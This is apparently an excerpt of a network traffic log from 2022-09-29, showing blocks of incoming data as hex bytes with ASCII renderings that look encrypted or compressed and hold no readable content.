                                                                                                        2022-09-29 12:45:18 UTC1407INData Raw: 99 6a 72 5d e1 2a 1e 65 51 3f 97 fe 35 16 22 9f df ed 01 1c f9 9c 02 f3 22 07 4f d9 a8 6e 84 d9 d7 4e a3 4f ac 84 d2 6c 4b 34 2f 7e 28 7e 6d 46 7a 81 ff 8b fc 99 35 ec 41 3b aa 38 5c 0a 26 b8 fc 40 b0 ca 55 8d 02 66 6b 81 5f ba d0 94 4c 74 b5 cb a5 38 9e 7c 58 d2 05 d7 7b d3 c0 9d dd 64 38 92 c5 46 07 4e 76 90 82 cf c5 3f 75 ee 72 7a e2 3d 60 f1 ad b9 a9 66 73 17 3e 5a f7 65 53 5a b8 f4 60 e8 d4 84 b0 4e 23 f7 2b 78 f2 db bf cc 5c 75 e5 d4 e5 8d 1e 24 70 da ed 0d 90 6e ec 1b 89 dc 88 ed 23 f4 cb ab 61 f0 1b 94 f8 91 e2 6b 72 9e bc d0 1c 7f 46 0b 15 ff b8 97 6d 0b e2 99 f8 f6 73 a2 89 99 c7 f1 57 41 87 ea 34 b9 98 4a a3 e0 d3 53 3b db 90 dc f1 31 2b 6c f3 11 38 54 de 49 5d 5b c7 a3 d9 bb b8 40 09 b2 28 6c dc 0b d5 4b db eb 1e 75 83 ce 73 d5 ce e5 15 dd 5b
                                                                                                        Data Ascii: jr]*eQ?5""OnNOlK4/~(~mFz5A;8\&@Ufk_Lt8|X{d8FNv?urz=`fs>ZeSZ`N#+x\u$pn#akrFmsWA4JS;1+l8TI][@(lKus[
                                                                                                        2022-09-29 12:45:18 UTC1423INData Raw: 10 88 8a 92 c1 d1 7f bc b0 6c 24 38 71 fd 99 72 4a cb 68 db 8a 23 b1 51 4b 1b 8c f4 d2 34 83 04 11 0b c5 66 3e e7 9d 17 b7 97 d1 27 df 87 17 36 56 a2 d4 bf 95 da 1f 9b d0 fe 87 08 e2 d0 00 b3 e5 96 71 01 ca 00 e0 ea e2 1d 92 54 bf 69 c2 c4 35 97 9c 45 2b 74 74 53 c6 51 9d d3 cc b3 1f 58 bd fc a6 dd c7 38 1f e8 36 cb 4c 37 9d 4c 19 25 47 c2 19 cf c6 02 ca 3e 18 55 24 79 94 27 40 05 a3 67 27 93 f7 65 a4 af 3e 1b 13 f9 4f a9 f2 1e ce 66 3f cc ef 60 a1 54 84 66 77 53 55 f2 d8 75 8c 74 58 2c 90 06 6b 28 09 5a 75 b5 07 b2 76 63 0a d4 83 6b 22 8e 17 95 cb 89 df b5 85 1a 6c 4f 89 27 f5 55 d1 cc 62 c2 55 bc 2c 2b 6c e6 40 44 c8 ba fb f4 b2 54 31 ac 30 4e ca 4d ce 41 a2 ad fc 46 14 df a1 b8 fa bc 33 a7 03 1e f7 ce ac 8e 8b 13 db 25 2c af a9 bf c6 71 ba 6a 56 85 56
                                                                                                        Data Ascii: l$8qrJh#QK4f>'6VqTi5E+ttSQX86L7L%G>U$y'@g'e>Of?`TfwSUutX,k(Zuvck"lO'UbU,+l@DT10NMAF3%,qjVV
                                                                                                        2022-09-29 12:45:18 UTC1432INData Raw: fe 4f 31 0b 5b a3 4a 83 be 58 e3 06 07 b0 5e 26 71 23 dd 84 25 e8 7e 30 9e f5 28 c6 a2 9b 0f 84 2a 1c 64 ae a6 b0 2e f3 5a 25 19 db fa 39 23 87 d6 bb f1 f0 5c 26 e5 a5 29 ef 00 02 b2 85 1d 43 fa ea 62 95 c0 7e d0 48 07 f5 18 8f 07 21 51 45 d5 c2 09 ca d7 87 90 a6 71 1d 84 46 e3 90 58 73 5d 3f 91 61 85 64 39 fd 8b 4f 90 d1 a3 23 c0 ec 06 9f b2 9d a5 cb 8c 08 6a d8 da 0c 09 71 39 52 be 49 f9 e4 89 d6 96 3c 86 f8 8a 9d c2 34 c7 3c 20 66 91 e9 29 c2 0e 58 ef 12 77 c5 64 11 58 13 bb 4a 9d 54 89 1e 25 4d 9e 0e 4b 15 49 30 e3 e4 ca 74 db 23 07 b3 6d d9 dc 4e 80 c6 6d 61 31 9b 3c 83 0a 2f 15 cf bc 03 d8 e6 f0 ef 9d 6c fb 0d 15 ae b5 7a da 6e 41 bc 4f a2 db 1e 3d ea 43 e3 09 4e 7b a7 9b f5 3b 19 4c ff 95 53 6f 5e 3f 03 ed 15 c5 56 bb 21 0e 9b df 06 28 cd 42 2a 59
                                                                                                        Data Ascii: O1[JX^&q#%~0(*d.Z%9#\&)Cb~H!QEqFXs]?ad9O#jq9RI<4< f)XwdXJT%MKI0t#mNma1</lznAO=CN{;LSo^?V!(B*Y
                                                                                                        2022-09-29 12:45:18 UTC1448INData Raw: eb d6 5b 88 5d 76 3b 1a f4 8e 91 c2 2e 31 8a 94 c9 a6 fd c5 7d 95 84 f6 e4 c2 89 1e 3a 78 93 c8 58 da 01 f4 ca 45 48 b6 6c 52 38 e2 b0 89 22 05 0d e7 0a 80 4f 02 d6 5a e4 c4 f9 9e 11 30 c5 bc 19 16 ee 52 17 4b 4b e7 c9 14 c4 d4 0a f2 c4 6b 72 53 dd 90 1a c4 84 1c b9 e2 dc ef 15 eb a6 e9 98 5f fb bc 48 ea 9d b2 02 e4 4f 6f 4c 93 b2 35 87 85 0b 2c a8 04 e0 15 7c 30 6c c7 1b bf 49 89 9a 89 fd c0 7f 2e 83 16 eb 5c f9 a5 23 ad 43 2a 15 02 6f 6a b5 1c e8 1e c3 31 8d 4b 62 46 9b a9 07 02 b8 9b 7e 3b ba b4 16 ef b8 42 3f 3c d1 9f 4e 77 cf 83 6b b1 06 8c 33 bf db e1 5e 05 1b 7e f3 5b c5 ca 7d 4e 87 77 72 a5 85 70 b0 c4 08 d0 ee 6d 72 fe c8 f1 87 3d 6a 0a 56 a4 bc 5f 51 87 c8 7c a0 df c6 8d 7d f3 0b 1d 87 7d 6b 38 e6 06 b1 86 22 28 13 20 2a ce d4 3d c2 b4 7b 86 b7
                                                                                                        Data Ascii: []v;.1}:xXEHlR8"OZ0RKKkrS_HOoL5,|0lI.\#C*oj1KbF~;B?<Nwk3^~[}Nwrpmr=jV_Q|}}k8"( *={
                                                                                                        2022-09-29 12:45:18 UTC1464INData Raw: 0b e1 a1 c6 d4 05 f9 d8 c4 fb f7 ac 6a a1 6c cc c1 4b cd 7e 5b 12 65 33 a2 5b 2e 28 72 2e 51 c9 1e 76 2a 00 f7 ee bc 77 a1 79 09 5c 0b fc 53 05 d0 6f 73 07 1e 4c 5b ed e3 c5 54 80 59 62 d0 6e 37 e4 54 84 21 40 d8 65 5d 4a c4 e9 d6 5b 95 c2 99 46 14 80 9c 26 5a 71 2e 22 39 63 19 1e 1c 78 73 4c 68 7a fc ac 22 60 86 98 7a 9a 5d ac 4d 5e 01 06 3a cc 54 8e db 3a e5 c1 ad 91 9e 43 4a e4 6f 9b 58 e2 5b 31 07 3a 8c f3 9f 6d 9a 52 6a ab cc 0b 40 6a 98 3b fb 0b 7e bc 99 63 fd 76 02 5b 32 bc 4f 49 4d db ed 41 4d f9 f0 e1 9e b8 6e b8 f8 6e 6d f7 66 af 62 29 c4 d1 ec 32 ad c4 98 00 96 36 dc 59 21 92 33 d0 59 e9 8e b5 d4 fb 50 19 de 74 c0 1a 5e e3 17 27 93 a4 f0 c7 1d 54 5d bf d7 9b 2e cf b2 b7 bd fe b8 8e f2 8e 43 bd fe b0 0a c5 4e 2a 89 7c 30 a8 a9 21 21 98 54 de 31
                                                                                                        Data Ascii: jlK~[e3[.(r.Qv*wy\SosL[TYbn7T!@e]J[F&Zq."9cxsLhz"`z]M^:T:CJoX[1:mRj@j;~cv[2OIMAMnnmfb)26Y!3YPt^'T].CN*|0!!T1
                                                                                                        2022-09-29 12:45:18 UTC1480INData Raw: 9d 9c 66 4b 79 df 70 98 c3 42 26 96 cc 9c 47 ad 60 dd 28 a2 71 eb 90 9d 9e 4f 61 af b8 9f f6 14 25 4a eb 08 bc 5f 7b cc 37 58 91 3a 52 da 54 63 b9 09 ae 20 a9 f8 49 df 9b a5 ac c5 cb 88 e1 ef 8e 96 ef 04 31 dc 26 42 e6 90 d4 5e e4 ba cc 4b 1b 8c b2 51 d5 8d b7 e0 63 26 0c 77 52 de 84 07 2c 4d 64 5a 0c 1f 95 bd 37 8b 11 82 d6 d8 ec 96 16 f4 3e 29 24 71 ae bd f0 5b ec 33 ed 5b 04 f4 96 1c f0 be fb 82 1e c0 c8 81 35 9e 55 2a fe b8 e0 f3 91 a4 9b 82 17 0a 47 aa ee 83 d8 4e f7 bc 89 90 0b 96 ac d4 1a 79 26 58 dd b5 23 67 b7 8b fa 0a 92 80 a4 88 19 66 7e 57 b6 b6 13 e7 9f 4e a1 2f d1 91 85 88 8d ae 81 35 8d 5f d2 5d f5 bd 0c 68 cf 59 05 f0 fb 4a 59 fe f3 5c ae e5 70 bb 18 3a 2e ce e9 9e dd d6 a9 a8 7f 74 b0 27 98 ff 88 5e ce 63 a5 51 d3 c7 89 df f9 b6 0f 58 d7
                                                                                                        Data Ascii: fKypB&G`(qOa%J_{7X:RTc I1&B^KQc&wR,MdZ7>)$q[3[5U*GNy&X#gf~WN/5_]hYJY\p:.t'^cQX
                                                                                                        2022-09-29 12:45:18 UTC1496INData Raw: d2 b8 04 6f de 63 d5 4d 6e 1e 16 07 3d ce 77 67 8a 3f 6f a4 d3 f4 85 08 91 71 55 3d 6e af 97 1d b6 95 32 ee 29 69 8e c2 67 4f 70 1d ff 04 c2 7f 48 32 be 4e 79 55 57 e2 f1 86 c7 75 14 79 1f 8c 7c 3e 60 00 6b 14 ed 83 53 24 23 a2 67 13 fa 20 19 bd 8e 10 68 bb 13 98 05 a1 f4 c5 cb 11 00 7b 92 99 ec 47 7c 45 b9 60 90 4e 70 a2 ce 2b f4 3e ed b6 f9 aa 60 8c d8 60 d1 a9 fd 04 68 eb 18 42 34 70 d1 d6 7f 0c b8 03 ad ed 6b 1a 2b a1 f9 07 82 4d 3f be 90 b8 f4 84 04 8f 2f 61 08 31 a7 92 5b ca 6e 8b 94 b3 36 6b bd 15 34 13 5a 83 d9 44 c7 16 c9 b8 42 28 e5 e9 21 d3 1c dc 45 1f d8 1e 66 15 e0 55 7e 48 46 19 09 bb e2 28 23 3b 42 d1 a9 a4 40 4d 3f af a5 5f ac 69 07 e4 16 e5 25 4c 85 d7 26 e0 c1 ce 6f 74 3e 3e cf 7d 8e 07 25 95 0b 46 a8 7c d6 56 ac 35 4f 93 50 a8 e4 10 60
                                                                                                        Data Ascii: ocMn=wg?oqU=n2)igOpH2NyUWuy|>`kS$#g h{G|E`Np+>``hB4pk+M?/a1[n6k4ZDB(!EfU~HF(#;B@M?_i%L&ot>>}%F|V5OP`
                                                                                                        2022-09-29 12:45:18 UTC1512INData Raw: f7 ac a9 69 f8 e4 7d 7a fc be ae f7 82 d9 99 3d 9d df c1 7e b5 38 49 8d 4c 7a c6 1d 02 d6 8b 65 0a 75 4e 1d 9f 32 79 60 8c 4c ea 10 d6 1d 12 33 9a b3 e3 d8 21 7d 15 8f 24 dd f7 fc 50 5f 35 7b da 2d c1 ea 70 6e ba 71 98 dc c1 c2 20 f1 7e 0e 1f 8a eb 8d e0 5f ac a5 9b e1 d5 5d 32 e1 d4 f9 4e d9 39 de f5 1f 64 e8 ee 4c 53 ae 42 12 c0 f8 ac 5d 42 c7 b4 bc 11 7d ab 70 01 35 30 a8 44 e4 63 3a 40 16 1d c5 7a 23 8f 95 61 cc 87 ae 20 ad d4 92 5f d1 16 78 00 db fe 25 e0 66 2b 9a 08 bf 05 5d 6d 36 ea 8c bc 88 93 76 29 03 b2 47 ee 95 c9 9e b2 49 b8 30 5a 48 87 c2 dd f1 b0 eb d0 67 0a 97 a9 77 86 19 f1 3f c6 75 1f b2 a4 2b a4 4f e6 33 7c b3 53 b6 9c 64 85 f9 7d 3b 53 74 b5 b8 f2 f9 9b 8d 95 97 72 86 52 6e 56 61 08 6f 36 d9 2c 4f 8c 4c fd b4 a3 dc 8f c7 f0 f2 bd 58 ec
                                                                                                        Data Ascii: i}z=~8ILzeuN2y`L3!}$P_5{-pnq ~_]2N9dLSB]B}p50Dc:@z#a _x%f+]m6v)GI0ZHgw?u+O3|Sd};StrRnVao6,OLX
                                                                                                        2022-09-29 12:45:18 UTC1528INData Raw: 68 06 11 58 2d ad 78 3f b8 3d 25 30 56 e4 a5 5f f9 0e 40 50 4e 98 87 09 65 08 ff 83 2d c6 71 c5 ef d8 ae aa 19 4a 64 da 73 8e 7f 98 d0 90 ee 80 9b 76 3c 24 11 98 c0 b2 fd fe fd f0 76 e7 99 12 a8 d5 d6 c6 73 6f 1e f8 47 b9 62 e2 2e d3 6b 78 d3 d4 2d 56 8c da e6 da 09 a0 06 75 56 c3 de 29 22 06 3c b1 c9 f1 ce 1e 5e b8 89 ab 33 6d 41 04 e2 fe 80 3a 90 99 67 a3 06 5d 6f fe ed 04 d0 9c d2 ed 7e fc ab b3 27 d3 9d 8e 30 25 ec 81 40 e2 35 8e 9b 4e 19 e8 a7 05 52 ab 60 a5 49 b7 37 55 6f 37 bf d5 6e c4 26 9c 70 60 6e 88 2f e2 46 01 d3 28 55 76 cf 72 1f f6 75 a6 03 bd f6 d8 29 8a ab df be 22 26 e4 ae c8 f8 c3 d4 4d 5b f0 5e c0 0e 43 a8 2e 49 d2 f4 55 f4 a2 38 1f 6c f2 82 3a 96 75 3c ae d9 ba e2 fc ce ea 65 ea 6b f6 4b cc ae 65 14 92 7f a2 b1 9c 9f c9 8e 71 61 d6 79
                                                                                                        Data Ascii: hX-x?=%0V_@PNe-qJdsv<$vsoGb.kx-VuV)"<^3mA:g]o~'0%@5NR`I7Uo7n&p`n/F(Uvru)"&M[^C.IU8l:u<ekKeqay
                                                                                                        2022-09-29 12:45:18 UTC1544INData Raw: 14 af 62 18 ad 51 7d 53 b3 27 74 ee 8d e9 74 4c d3 ce 2a d7 e5 22 05 4a 83 53 22 36 dd d5 24 a9 a8 f1 4f 2c e9 82 90 26 72 b8 84 bb 99 e7 56 b7 f7 0e c6 25 3e d0 3b c9 00 5f 3a bc 0e 61 d1 05 bc 5b 4e 70 c9 a7 97 b5 db 4c 2a 1d 00 8b c1 f7 c5 a2 ab 24 db 7d 13 46 f2 5a 66 ad 4f ae 6f 0d 3a ab e6 95 f0 49 2f ae 42 fd f7 6a c9 81 70 6f e9 ed 8d 8a 6e 7d 6c ac e8 e7 03 6a 65 fc 10 9a 67 4f c7 6e c7 52 68 d2 d4 de 9c 3f 04 39 9a 56 eb 81 6d 22 4c 91 82 03 9a 99 2f 17 f2 34 7a 08 e4 ee 47 ce 8f 30 6a 5c 8a db cc ab f3 de 6a d9 c9 bc 76 10 04 d3 ba 61 be 58 66 8a 36 d0 39 b7 82 ea b8 f6 f4 53 0c b4 a1 02 39 c7 07 1b 51 04 2d e6 29 86 23 a3 50 c6 17 e4 10 5b 80 64 a2 93 01 c2 97 0d 7a cc 26 d7 fe bd 56 8f 95 be b1 99 4d 4c bf 4a 4b b1 6c b1 ed 80 79 8d 77 a6 0e
                                                                                                        Data Ascii: bQ}S'ttL*"JS"6$O,&rV%>;_:a[NpL*$}FZfOo:I/Bjpon}ljegOnRh?9Vm"L/4zG0j\jvaXf69S9Q-)#P[dz&VMLJKlyw
                                                                                                        2022-09-29 12:45:18 UTC1560INData Raw: fd a3 81 0e 83 96 58 dd ba c2 b3 ef 51 ce e9 58 23 98 4f b7 49 1b 9d 2f 25 c5 cc 65 2c 84 8c 12 06 3b 8d 72 15 66 c6 37 52 4c 5b fb 25 00 e6 d2 6e 55 91 fd 1f 03 75 1b 39 4e 72 60 f8 22 eb 18 11 f6 7b 39 16 cc 14 ae 84 29 98 18 c9 c2 9f 2c b2 ea c5 73 82 fa b9 7d 49 99 56 03 2e f2 4f e8 fa e0 05 d9 cb b4 d0 1b ba 1d b2 d0 bc c3 a2 1f 10 92 35 7c 25 1e fc 5f ba 86 e7 fc 94 db c5 ea 4e 4b 19 a4 eb 7b 60 21 7f fd 09 1b dd ab 6e 23 10 0b ef f8 15 d4 03 16 c7 ae 0b 39 de c1 66 01 39 86 19 a2 fe d0 5f 27 b3 2b 70 93 fd 52 7f 27 65 4a 0e eb b5 85 a3 5d 24 07 af 5e 19 25 55 b7 58 38 6c 88 63 fb 26 34 05 f0 a9 17 01 52 c4 29 fc e9 fa 8a a6 01 5a 3e 2b 51 90 63 35 66 8c 19 fe 8f bd 11 4f 5d 26 02 ff 37 bf fc 73 4a 16 1e 92 d6 52 cf 51 1c 32 c3 2c 21 2a 6f cb 36 6e
                                                                                                        Data Ascii: XQX#OI/%e,;rf7RL[%nUu9Nr`"{9),s}IV.O5|%_NK{`!n#9f9_'+pR'eJ]$^%UX8lc&4R)Z>+Qc5fO]&7sJRQ2,!*o6n
                                                                                                        2022-09-29 12:45:18 UTC1576INData Raw: 6a e9 3f 2f 06 84 e3 9a 40 f0 c4 38 ea db 10 26 83 21 c8 4f ae af 45 91 a8 3d 88 b6 41 5d 59 c8 d8 e7 21 e9 37 da 95 19 a7 a7 fa 8c 44 f2 26 14 18 f9 0b 93 33 6f e6 97 13 09 04 a9 07 76 53 4e b8 15 ab 7e 9e 26 92 29 b7 f0 8f ec cd 75 35 58 f2 74 b5 21 59 54 7f f7 01 24 e7 db fb dd cd cc 48 32 de 86 2d 2a 1c 65 8d b0 4c 11 26 be 06 30 ce 4a 76 a1 4e e0 05 27 ac b9 2c e1 a6 ec d5 17 c4 f1 0a 90 9b d2 0a 28 47 05 ec 67 df 49 8e ff 90 9b 26 cc eb 22 e9 33 87 04 4e d8 ad 36 93 64 a2 73 81 5f ad 05 75 56 c1 5b 2b 6f 9f 0d 68 31 0c 3a 04 dc b5 90 11 e3 a2 9d a5 48 29 36 81 98 24 9c f2 40 d5 9f 2b e1 31 e2 6f 12 42 56 76 56 83 f3 de b7 96 64 f0 d7 85 2e 63 b4 50 22 e7 a9 24 55 bd f2 d6 81 03 b2 da 3d 6b d5 02 46 33 9f ff 15 0e 6c 71 71 3b cd b6 fe 3b 2f 6a 0a 74
                                                                                                        Data Ascii: j?/@8&!OE=A]Y!7D&3ovSN~&)u5Xt!YT$H2-*eL&0JvN',(GgI&"3N6ds_uV[+oh1:H)6$@+1oBVvVd.cP"$U=kF3lqq;;/jt
                                                                                                        2022-09-29 12:45:18 UTC1592INData Raw: af 26 f8 31 e9 01 2a ad f1 97 5a bf 7d 64 65 78 1a fc 6a 57 8f ac d4 7c 85 8d b1 a8 c0 5b ac 16 27 8f 5f 67 ad e0 84 79 62 fc 94 e5 a5 25 77 17 fe 18 11 0b b1 d1 6c 40 ec 33 78 67 20 0f 26 49 18 48 9f 34 e3 52 74 4f 4a 08 36 62 c6 52 6f b7 6b 58 7e f8 d7 a5 e5 59 4a 36 bb 3d c5 c5 14 a3 d1 8c 26 60 f8 4f 89 ce 9e 13 14 65 37 5e f5 a5 8d a2 0a 64 8f 0a c0 cb e2 88 5c 70 6f 86 19 fe 08 f5 f7 68 de a0 cb cc f5 1f ea 93 f3 a1 1c ae 53 a9 a6 df 1b 9b 54 8d 03 68 f3 61 24 2e 0d b8 1f 96 47 15 89 de 3a 6f dc 9b c8 35 79 ad e8 84 0f 50 e4 f5 fe 78 4d be a9 5e 78 88 21 37 14 7f 10 f6 93 5c 6c f5 be 7d 8f 75 d5 c8 fe 36 5d de 41 54 d5 4a e8 92 05 d3 57 de 82 36 2c 91 aa 83 c6 d6 f7 6a 24 b1 d2 9e 0f 1d 95 be 0c 3a eb 38 be 10 ec fb e2 d9 ad 60 8f 70 b4 29 d6 7c b8
                                                                                                        Data Ascii: &1*Z}dexjW|['_gyb%wl@3xg &IH4RtOJ6bRokX~YJ6=&`Oe7^d\pohSTha$.G:o5yPxM^x!7\l}u6]ATJW6,j$:8`p)|
                                                                                                        2022-09-29 12:45:18 UTC1608INData Raw: 46 dd 02 8d 36 80 b1 ca 44 9d d0 5b 4a 08 34 72 1d ee af 0c 17 f0 3d 68 b2 82 2f 84 66 73 4d c2 6f 92 8e 19 d1 06 77 d4 88 89 1a 5e d8 50 17 d8 10 4c ab 8a ae ae 0c df d9 2d d0 93 50 b8 f5 9f 9f ab 2b 55 c8 9a a9 76 5f 05 5f fb 23 74 e9 fc 49 a6 d1 58 0c 87 56 98 7f 76 3a 97 5f ad 67 7c 9d 16 1e cc 86 1c da 00 da a5 19 15 d4 e7 6a 31 0e be ff 64 33 ab 7a 63 85 5d 99 5a 4f 57 b2 58 ba 67 7e cd a3 f7 c3 6e a7 92 f2 bf 85 0f 8f d6 e1 44 5b ea 94 88 62 9f ad c4 b7 d1 b6 7d 27 f7 1a a1 62 ee a4 12 f0 de 06 59 b8 b2 86 95 6c c4 e7 db 3a 10 a4 7d e9 b1 c0 a9 e5 75 20 94 06 73 a9 5b c3 8d f7 57 17 2d fc 6d da 0b 9d ff 58 62 1f 28 04 b4 9f 5e 7c e6 d5 55 47 e7 13 ee b8 91 a0 cc c6 90 4e 97 e3 c7 fc db 5d e5 bd ce 3e e5 e2 82 dc 7d 87 58 0b 13 f9 64 19 20 44 3d ff
                                                                                                        Data Ascii: F6D[J4r=h/fsMow^PL-P+Uv__#tIXVv:_g|j1d3zc]ZOWXg~nD[b}'bYl:}u s[W-mXb(^|UGN]>}Xd D=
                                                                                                        2022-09-29 12:45:18 UTC1624INData Raw: 6e 8e 8f 6f 33 64 67 29 04 ed 3e ee f4 95 08 2e d2 4c 5c af 6e c3 7b 56 57 61 c0 49 bb 50 a7 ca 6d 32 f4 f5 08 71 6f 93 ac 0d 5a c1 36 14 7b 46 38 8e 38 30 5d c2 3a 3c 4e cb 87 75 62 4d e5 14 b3 a8 28 1f 95 59 c0 61 2c 4f e6 1c 39 31 2f 1f 81 93 51 9b 4f e0 4c 0a 20 f1 4d 34 5a ec 62 2b 6b a9 f0 5d d5 30 dc 14 c9 b2 50 4c 6d 33 11 2d 6f e8 6b be 57 c2 12 5d 7d d2 e3 93 fd 84 08 75 c0 0e 9c 01 f0 4a 37 67 20 96 29 0b ea 74 9d b5 d0 57 01 1b c6 30 11 26 a0 6b 5c a6 36 39 37 c5 34 c3 d3 1b a2 46 1e 8c 74 ae 88 d9 2e d7 de 5f b2 8b 4e 2d 05 f7 da b6 ea 41 3c b9 40 a3 ad a0 23 a1 df 67 44 cf 73 c5 2c dd 01 d6 4d 12 72 73 1b a3 75 b0 14 af 8d 30 3a 36 8d 7f 45 db 38 17 44 6a 40 b6 f4 62 10 9a 7c 75 6a 7c c3 40 b3 6f 2f 1e 32 3f 57 8e 7d d1 1f fd a2 e5 1f 77 4d
                                                                                                        Data Ascii: no3dg)>.L\n{VWaIPm2qoZ6{F880]:<NubM(Ya,O91/QOL M4Zb+k]0PLm3-okW]}uJ7g )tW0&k\6974Ft._N-A<@#gDs,Mrsu0:6E8Dj@b|uj|@o/2?W}wM
                                                                                                        2022-09-29 12:45:18 UTC1640INData Raw: ec 87 92 80 9b 0e 89 3a 2a 6d ce c8 77 96 b8 09 29 6f 3a 73 c3 f5 c1 60 2a a9 d7 62 2f a4 20 f0 fc b9 65 86 a2 4a 69 aa 67 ed 83 09 d5 00 fc 8f 42 30 34 61 c4 b7 09 68 5b de 95 99 50 07 31 a1 f9 a3 2f 7c d3 62 9f 99 af 22 b5 f8 14 e8 d3 5e b9 2b 73 9f 06 17 a5 29 f8 8f bc f9 88 25 92 18 a9 5a 54 10 35 0d 07 74 6d d9 d7 ba 74 30 bb 0b c5 9a 58 31 39 a2 ad 17 dc 32 4e bd 9f 0a 48 43 91 93 ab 83 6c 29 43 f5 b4 7c a5 44 69 97 6c 1f 7c 6a 59 be a4 b6 e6 04 da d7 d3 db 09 3c 24 22 8a 2f f0 6a 53 d8 ed f3 49 74 3d c5 d7 b7 41 00 04 1b ed 43 c9 2a c3 b9 95 46 3e 28 0a ce 4a 5d a9 23 31 89 97 64 96 68 57 82 c7 28 0b 1a 9c bb ea 94 66 ed 2d b5 3c 40 c8 a9 ac 9f 01 5a c9 ef 2d fe 77 9b 7e 45 3d 4e 56 1f 02 6f 20 83 9b 0c 03 de d7 bb c6 6f 9c be 0e a8 6b 1f 03 7b 76
                                                                                                        Data Ascii: :*mw)o:s`*b/ eJigB04ah[P1/|b"^+s)%ZT5tmt0X192NHCl)C|Dil|jY<$"/jSIt=AC*F>(J]#1dhW(f-<@Z-w~E=NVo ok{v
                                                                                                        2022-09-29 12:45:18 UTC1656INData Raw: 65 1f fd 25 0f dc be a1 b2 e1 5d 45 e0 3c 69 e9 4f ed 61 08 91 3c c0 fe df 26 31 df ce d5 a7 57 ed 0b e9 a1 6c e1 37 1e e2 69 cc 47 6d 4f 8a d8 d1 fb 57 63 e2 87 f9 14 ab 1b 19 dd b4 aa e2 8c 8a a6 71 0c 20 a2 87 10 3c 6f f5 fa 60 98 99 88 9e de 83 5f 7f ef 9a 38 cd 7e d2 24 6a 23 c8 f2 b7 b8 7b 54 5a 5c 91 98 f4 74 8c 8e a5 1c 9b 7d 20 ae e9 04 5f 8f f7 b3 aa 53 3e 8b 9e a3 a3 64 af 3c 4b 55 c5 eb ab 4f 46 1c a4 c0 ab b7 11 31 d1 19 ee 9d 04 64 5a 5a 21 d0 3e d8 d5 0f f8 68 21 3d 0f 37 12 42 3b 35 63 01 c0 d7 78 22 4b a3 d7 e5 ae 09 3e 36 81 a1 05 ee 74 e5 d7 60 2b 47 10 23 52 e7 c3 95 09 97 b4 b7 9c fd 2d d3 94 c1 4c 4c bb f2 57 fe 23 5c a4 5e 2d 55 fc ce 32 81 db e8 09 ab 23 ca bc 94 01 3d 23 ec 0d c5 b2 ed 1c 32 72 8b 88 2e a0 38 c6 eb 1d 01 bb 3c 4a
                                                                                                        Data Ascii: e%]E<iOa<&1Wl7iGmOWcq <o`_8~$j#{TZ\t} _S>d<KUOF1dZZ!>h!=7B;5cx"K>6t`+G#R-LLW#\^-U2#=#2r.8<J
                                                                                                        2022-09-29 12:45:18 UTC1672INData Raw: 8b cb 0f 13 6c 79 ec 01 75 72 46 b1 3d 6e 41 8f 30 2c 38 b9 be a2 c2 62 f3 58 07 35 9c 40 2d c9 36 72 e2 b3 6e cc 0c cb ab 35 4a 98 04 4a e1 c6 5c d0 bb 99 0f 18 69 94 44 7e 6b 82 2b d8 f5 d0 cf d4 09 c3 bc 36 80 f9 9b 75 f8 fb ad 7a 4d fa 40 b6 ba e2 fe f6 b5 3f 54 37 db 2b 6b f8 fe 4c 1c a1 da 08 2e ca e5 61 3a 06 7b 2e 89 41 73 d1 a3 b6 74 25 99 f2 65 a2 86 1a 62 8a 4a 1d 3f 84 86 0f 81 3f 02 92 9f ee f6 69 1d fd a0 bf 95 48 eb 1e 13 19 86 42 b2 41 29 a8 7d 41 ef e0 a0 ac bf 94 eb b5 d8 25 da b1 2c f0 12 30 9b 9c c9 3c f3 d1 7b 13 d8 e8 d1 32 ba 1f 36 b5 24 d3 d1 e3 ed 4c 9d 0a 07 36 7d 95 73 06 bb cf a5 7d 23 ac 65 42 51 e8 d4 a1 eb ce 6c ae 5f 46 c9 67 34 f7 0f ae 31 10 43 31 4a 91 87 f3 7f ca f4 97 72 0b 8b 9b e9 27 50 68 76 50 21 d9 31 d2 f6 5f a6
                                                                                                        Data Ascii: lyurF=nA0,8bX5@-6rn5JJ\iD~k+6uzM@?T7+kL.a:{.Ast%ebJ??iHBA)}A%,0<{26$L6}s}#eBQl_Fg41C1Jr'PhvP!1_
                                                                                                        2022-09-29 12:45:18 UTC1688INData Raw: ec c5 e7 b9 4e ea 9d 47 96 c6 cc 4b 92 a1 d8 b0 fd 7e cc 5d 1a f5 2b 79 da c1 87 17 e8 75 3b d8 bf 78 77 0d 7a ed 17 23 c3 df ce c4 1c f2 c1 33 a1 5f 20 bf 96 93 15 45 86 bb 34 c6 b0 c1 0e c4 7d 76 63 8c 5e ce 1e cf 62 e9 a1 60 e4 ed 2b 7e d4 fc 49 8c 01 3a cd f3 af 09 72 70 7b ff 54 92 7e 93 64 5f c2 0d d6 80 1c 28 9e 1f 9c 2d 88 59 88 83 73 2a b3 e7 a3 34 f7 9c e1 01 45 9a cb 0b 16 5e b1 0f 3a 48 00 bd 68 a5 69 a3 bd 99 6e 6c 83 cc d5 22 97 7a 26 0b 4b 3b 2a 1a b4 7f be f7 32 e6 ff 89 e3 ac f1 8d 3f 4f d5 91 e7 54 d6 64 3c a1 81 5d 51 1d 59 5f 3f 7a a5 91 bb 1c c8 61 34 16 e7 3a 90 93 b5 46 8b 0b 86 49 fa 81 aa d6 6d 48 22 7c 2a bb c7 f1 35 4f a2 02 30 58 4c 89 c5 9d dc 22 3d 58 82 e6 16 fe 83 a1 42 a8 9c fb 09 bc bf c8 40 28 89 b1 21 cc 2b f5 cd f2 b9
                                                                                                        Data Ascii: NGK~]+yu;xwz#3_ E4}vc^b`+~I:rp{T~d_(-Ys*4E^:Hhinl"z&K;*2?OTd<]QY_?za4:FImH"|*5O0XL"=XB@(!+
